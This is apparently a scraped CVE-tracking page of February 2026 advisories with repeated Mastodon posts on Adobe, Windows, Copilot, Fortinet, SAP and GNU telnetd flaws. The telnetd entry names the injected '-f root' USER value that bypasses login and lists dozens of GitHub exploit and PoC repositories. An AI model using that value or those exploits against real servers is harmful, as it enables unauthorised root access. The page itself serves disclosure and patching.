After Effects versions 25.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21251
(7.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:30:51

2 posts

Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.

thehackerwire@mastodon.social at 2026-02-11T01:28:50.000Z ##

🟠 CVE-2026-21251 - High (7.8)

Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:28:50.000Z ##

🟠 CVE-2026-21251 - High (7.8)

Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21250
(7.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:30:51

2 posts

Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.

thehackerwire@mastodon.social at 2026-02-11T01:25:35.000Z ##

🟠 CVE-2026-21250 - High (7.8)

Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:25:35.000Z ##

🟠 CVE-2026-21250 - High (7.8)

Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker to elevate privileges locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21329
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:51

2 posts

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:16:21.000Z ##

🟠 CVE-2026-21329 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:16:21.000Z ##

🟠 CVE-2026-21329 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21326
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:51

2 posts

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:15:53.000Z ##

🟠 CVE-2026-21326 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:15:53.000Z ##

🟠 CVE-2026-21326 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21351
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:51

2 posts

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:40:11.000Z ##

🟠 CVE-2026-21351 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:40:11.000Z ##

🟠 CVE-2026-21351 - High (7.8)

After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21256
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-10T18:30:50

2 posts

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.

thehackerwire@mastodon.social at 2026-02-11T01:20:53.000Z ##

🟠 CVE-2026-21256 - High (8.8)

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:20:53.000Z ##

🟠 CVE-2026-21256 - High (8.8)

Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21255
(8.8 HIGH)

EPSS: 0.03%

updated 2026-02-10T18:30:50

2 posts

Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.

thehackerwire@mastodon.social at 2026-02-11T01:15:30.000Z ##

🟠 CVE-2026-21255 - High (8.8)

Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:15:30.000Z ##

🟠 CVE-2026-21255 - High (8.8)

Improper access control in Windows Hyper-V allows an authorized attacker to bypass a security feature locally.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21312
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:50

2 posts

Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T01:15:19.000Z ##

🟠 CVE-2026-21312 - High (7.8)

Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T01:15:19.000Z ##

🟠 CVE-2026-21312 - High (7.8)

Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21321
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:50

2 posts

After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:35:35.000Z ##

🟠 CVE-2026-21321 - High (7.8)

After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:35:35.000Z ##

🟠 CVE-2026-21321 - High (7.8)

After Effects versions 25.6 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21325
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:50

2 posts

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:12:47.000Z ##

🟠 CVE-2026-21325 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:12:47.000Z ##

🟠 CVE-2026-21325 - High (7.8)

After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21335
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:50

2 posts

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-11T00:12:28.000Z ##

🟠 CVE-2026-21335 - High (7.8)

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-11T00:12:28.000Z ##

🟠 CVE-2026-21335 - High (7.8)

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21334
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T18:30:50

2 posts

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

thehackerwire@mastodon.social at 2026-02-10T23:40:31.000Z ##

🟠 CVE-2026-21334 - High (7.8)

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:40:31.000Z ##

🟠 CVE-2026-21334 - High (7.8)

Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21516
(8.8 HIGH)

EPSS: 0.04%

updated 2026-02-10T18:30:50

2 posts

Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.

thehackerwire@mastodon.social at 2026-02-10T23:39:22.000Z ##

🟠 CVE-2026-21516 - High (8.8)

Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:39:22.000Z ##

🟠 CVE-2026-21516 - High (8.8)

Improper neutralization of special elements used in a command ('command injection') in Github Copilot allows an unauthorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22153
(8.1 HIGH)

EPSS: 0.07%

updated 2026-02-10T18:30:48

1 posts

An Authentication Bypass by Primary Weakness vulnerability [CWE-305] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4 may allow an unauthenticated attacker to bypass LDAP authentication of Agentless VPN or FSSO policy, when the remote LDAP server is configured in a specific way.

undercodenews@mastodon.social at 2026-02-11T09:38:02.000Z ##

Critical FortiOS Vulnerability Exposes Networks to LDAP Authentication Bypass

Fortinet has issued a major security alert warning of a serious flaw in its FortiOS firewall software. The vulnerability, tracked as CVE-2026-22153, allows attackers to bypass LDAP authentication entirely—meaning hackers can gain access without needing a valid username or password. This type of breach could compromise sensitive enterprise networks and VPN connections, putting critical data at…

undercodenews.com/critical-for

##

CVE-2025-52436
(8.8 HIGH)

EPSS: 0.14%

updated 2026-02-10T18:30:40

1 posts

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an unauthenticated attacker to execute commands via crafted requests.

CVE-2026-1602
(6.5 MEDIUM)

EPSS: 0.05%

updated 2026-02-10T18:30:38

2 posts

SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote authenticated attacker to read arbitrary data from the database.

AAKL at 2026-02-10T16:58:56.429Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur

##

AAKL@infosec.exchange at 2026-02-10T16:58:56.000Z ##

New.

Ivanti's vulnerabilities have been wreaking havoc in Europe.

Meanwhile:

Ivanti February 2026 Security Update ivanti.com/blog/february-2026-

The actual security advisory affecting CVE-2026-1602 and CVE-2026-1603 was posted yesterday:

Ivanti Security Advisory EPM February 2026 for EPM 2024 hub.ivanti.com/s/article/Secur #Ivanti #infosec #vulnerability

##

CVE-2026-24061
(9.8 CRITICAL)

EPSS: 36.95%

updated 2026-02-10T18:30:34

4 posts

telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a "-f root" value for the USER environment variable.

Nuclei template

62 repos

https://github.com/SeptembersEND/CVE--2026-24061

https://github.com/lavabyte/telnet-CVE-2026-24061

https://github.com/TryA9ain/CVE-2026-24061

https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector

https://github.com/Moxxic1/moxxic1.github.io

https://github.com/Mefhika120/Ashwesker-CVE-2026-24061

https://github.com/XsanFlip/CVE-2026-24061-Scanner

https://github.com/monstertsl/CVE-2026-24061

https://github.com/cumakurt/tscan

https://github.com/killsystema/scan-cve-2026-24061

https://github.com/parameciumzhang/Tell-Me-Root

https://github.com/cyberpoul/CVE-2026-24061-POC

https://github.com/BrainBob/CVE-2026-24061

https://github.com/Gabs-hub/CVE-2026-24061_Lab

https://github.com/xuemian168/CVE-2026-24061

https://github.com/obrunolima1910/CVE-2026-24061

https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root

https://github.com/balgan/CVE-2026-24061

https://github.com/h3athen/CVE-2026-24061

https://github.com/SafeBreach-Labs/CVE-2026-24061

https://github.com/leonjza/inetutils-telnetd-auth-bypass

https://github.com/punitdarji/telnetd-cve-2026-24061

https://github.com/madfxr/Twenty-Three-Scanner

https://github.com/hilwa24/CVE-2026-24061

https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061

https://github.com/Good123321-bot/CVE-2026-24061-POC

https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd

https://github.com/SystemVll/CVE-2026-24061

https://github.com/hackingyseguridad/root

https://github.com/Parad0x7e/CVE-2026-24061

https://github.com/z3n70/CVE-2026-24061

https://github.com/infat0x/CVE-2026-24061

https://github.com/Chocapikk/CVE-2026-24061

https://github.com/r00tuser111/CVE-2026-24061

https://github.com/typeconfused/CVE-2026-24061

https://github.com/ms0x08-dev/CVE-2026-24061-POC

https://github.com/Mr-Zapi/CVE-2026-24061

https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-

https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061

https://github.com/ibrahmsql/CVE-2026-24061-PoC

https://github.com/yanxinwu946/CVE-2026-24061--telnetd

https://github.com/buzz075/CVE-2026-24061

https://github.com/ridpath/Terrminus-CVE-2026-2406

https://github.com/X-croot/CVE-2026-24061_POC

https://github.com/midox008/CVE-2026-24061

https://github.com/Good123321-bot/good123321-bot.github.io

https://github.com/Alter-N0X/CVE-2026-24061-POC

https://github.com/scumfrog/cve-2026-24061

https://github.com/m3ngx1ng/cve_2026_24061_cli

https://github.com/franckferman/CVE_2026_24061_PoC

https://github.com/Ali-brarou/telnest

https://github.com/obrunolima1910/obrunolima1910.github.io

https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061

https://github.com/duy-31/CVE-2026-24061---telnetd

https://github.com/Lingzesec/CVE-2026-24061-GUI

https://github.com/Moxxic1/Tell-Me-Root

https://github.com/0x7556/CVE-2026-24061

https://github.com/shivam-bathla/CVE-2026-24061-setup

https://github.com/JayGLXR/CVE-2026-24061-POC

https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester

https://github.com/novitahk/Exploit-CVE-2026-24061

https://github.com/LucasPDiniz/CVE-2026-24061

hrbrmstr@mastodon.social at 2026-02-10T20:38:58.000Z ##

I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…

The day the telnet died

On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.

labs.greynoise.io/grimoire/202

##

oversecurity@mastodon.social at 2026-02-10T15:20:05.000Z ##

~/CVE/CVE-2026-24061_telnetd

Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...

🔗️ [Lobsec] link.is.it/6L9jY6

##

hrbrmstr@mastodon.social at 2026-02-10T20:38:58.000Z ##

I can't remember if I cried
When my `-f root` hit an ACL line
But something touched me deep inside…

The day the telnet died

On January 14, 2026, global telnet traffic observed by the GreyNoise Global Observation Grid fell off a cliff. A 59% sustained reduction, eighteen ASNs going completely silent, five countries vanishing (telnet-wise) from our data entirely. Six days later, CVE-2026-24061 dropped. Coincidence is one explanation.

labs.greynoise.io/grimoire/202

##

oversecurity@mastodon.social at 2026-02-10T15:20:05.000Z ##

~/CVE/CVE-2026-24061_telnetd

Analisi approfondita del CVE-2026-24061 telnetd exploit. Scopri come una mancata sanificazione in GNU InetUtils permetta l'ottenimento di privilegi...

🔗️ [Lobsec] link.is.it/6L9jY6

##

CVE-2025-6967
(8.7 HIGH)

EPSS: 0.02%

updated 2026-02-10T15:30:34

4 posts

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

thehackerwire@mastodon.social at 2026-02-10T14:18:47.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:21.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:47.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T14:18:21.000Z ##

🟠 CVE-2025-6967 - High (8.7)

Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technology Services Industry and Trade Ltd. Co. CMS allows JSON Hijacking (aka JavaScript Hijacking), Authentication Bypass.This issue affects CMS: through 10022026.

NOTE: T...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0509
(9.6 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T15:22:54.740000

6 posts

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integrity and availability, and no impact on the confidentiality of the application.

beyondmachines1 at 2026-02-11T09:01:32.444Z ##

SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws

SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.

**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**

beyondmachines.net/event_detai

##

se38@nrw.social at 2026-02-10T10:07:11.000Z ##

3674774 - [CVE-2026-0509] Missing Authorization check in SAP NetWeaver Application Server #ABAP and ABAP Platform
me.sap.com/notes/3674774

##

beyondmachines1@infosec.exchange at 2026-02-11T09:01:32.000Z ##

SAP February 2026 Updates Patch Critical CRM, S/4HANA and NetWeaver Flaws

SAP's February 2026 Patch Tuesday addresses 27 security notes, including two critical vulnerabilities: CVE-2026-0488, code injection flaw in SAP CRM/S/4HANA enabling full database compromise, and CVE-2026-0509, missing authorization check in NetWeaver AS ABAP allowing unauthorized remote function calls.

**Make sure all SAP platforms are isolated from the internet and accessible from trusted networks only. Prioritize patching the CRM and S/4HANA Scripting Editor and NetWeaver Application Server ABAP critical vulnerabilities, then address the high-severity XML Signature Wrapping flaw in NetWeaver and the DoS issues in Supply Chain Management and BusinessObjects.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

offseq@infosec.exchange at 2026-02-10T04:30:31.000Z ##

🛡️ CRITICAL: CVE-2026-0509 in SAP NetWeaver ABAP (7.22 – 9.19) lets authenticated users run unauthorized background RFCs, risking integrity & availability. Patch when available, restrict S_RFC, monitor RFC usage. Details: radar.offseq.com/threat/cve-20 #OffSeq #SAP #CVE20260509 #infosec

##

thehackerwire@mastodon.social at 2026-02-10T04:21:59.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:13.000Z ##

🔴 CVE-2026-0509 - Critical (9.6)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, low-privileged user to perform background Remote Function Calls without the required S_RFC authorization in certain cases. This can result in a high impact on integri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23687
(8.8 HIGH)

EPSS: 0.05%

updated 2026-02-10T15:22:54.740000

5 posts

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information, unauthorized access to sensitive user data and potential disruption of normal system usage.

DarkWebInformer at 2026-02-10T17:52:38.117Z ##

‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)

darkwebinformer.com/xml-signat

##

DarkWebInformer@infosec.exchange at 2026-02-10T17:52:38.000Z ##

‼️ XML Signature Wrapping Vulnerability in SAP NetWeaver ABAP Enables Identity Tampering and Unauthorized Access (CVE-2026-23687)

darkwebinformer.com/xml-signat

##

thehackerwire@mastodon.social at 2026-02-10T04:22:30.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:55.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T04:21:03.000Z ##

🟠 CVE-2026-23687 - High (8.8)

SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered iden...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-40587
(7.6 HIGH)

EPSS: 0.02%

updated 2026-02-10T15:22:54.740000

2 posts

A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), Polarion V2410 (All versions < V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authenticated remote attacker to conduct a stored cross-site scripting attack by creating specially crafted document titles that are later viewed by other users of the a

thehackerwire@mastodon.social at 2026-02-10T11:01:50.000Z ##

🟠 CVE-2025-40587 - High (7.6)

A vulnerability has been identified in Polarion V2404 (All versions &lt; V2404.5), Polarion V2410 (All versions &lt; V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T11:01:50.000Z ##

🟠 CVE-2025-40587 - High (7.6)

A vulnerability has been identified in Polarion V2404 (All versions &lt; V2404.5), Polarion V2410 (All versions &lt; V2410.2). The affected application allows arbitrary JavaScript code be included in document titles. This could allow an authentica...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25656
(7.8 HIGH)

EPSS: 0.01%

updated 2026-02-10T15:22:54.740000

2 posts

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions < V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user. This could allow an attacker to load malicious DLLs, potentially leading to arbitrary code execution with SYSTEM privileges.(ZDI-CAN-28108)

thehackerwire@mastodon.social at 2026-02-10T10:30:40.000Z ##

🟠 CVE-2026-25656 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions &lt; V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T10:30:40.000Z ##

🟠 CVE-2026-25656 - High (7.8)

A vulnerability has been identified in SINEC NMS (All versions), User Management Component (UMC) (All versions &lt; V2.15.2.1). The affected application permits improper modification of a configuration file by a low-privileged user.
This could al...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-11242
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-02-10T15:22:54.740000

2 posts

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

thehackerwire@mastodon.social at 2026-02-10T09:52:31.000Z ##

🔴 CVE-2025-11242 - Critical (9.8)

Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems Software Publishing Industry and Trade Inc. Okulistik allows Server Side Request Forgery.This issue affects Okulistik: through 21102025.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

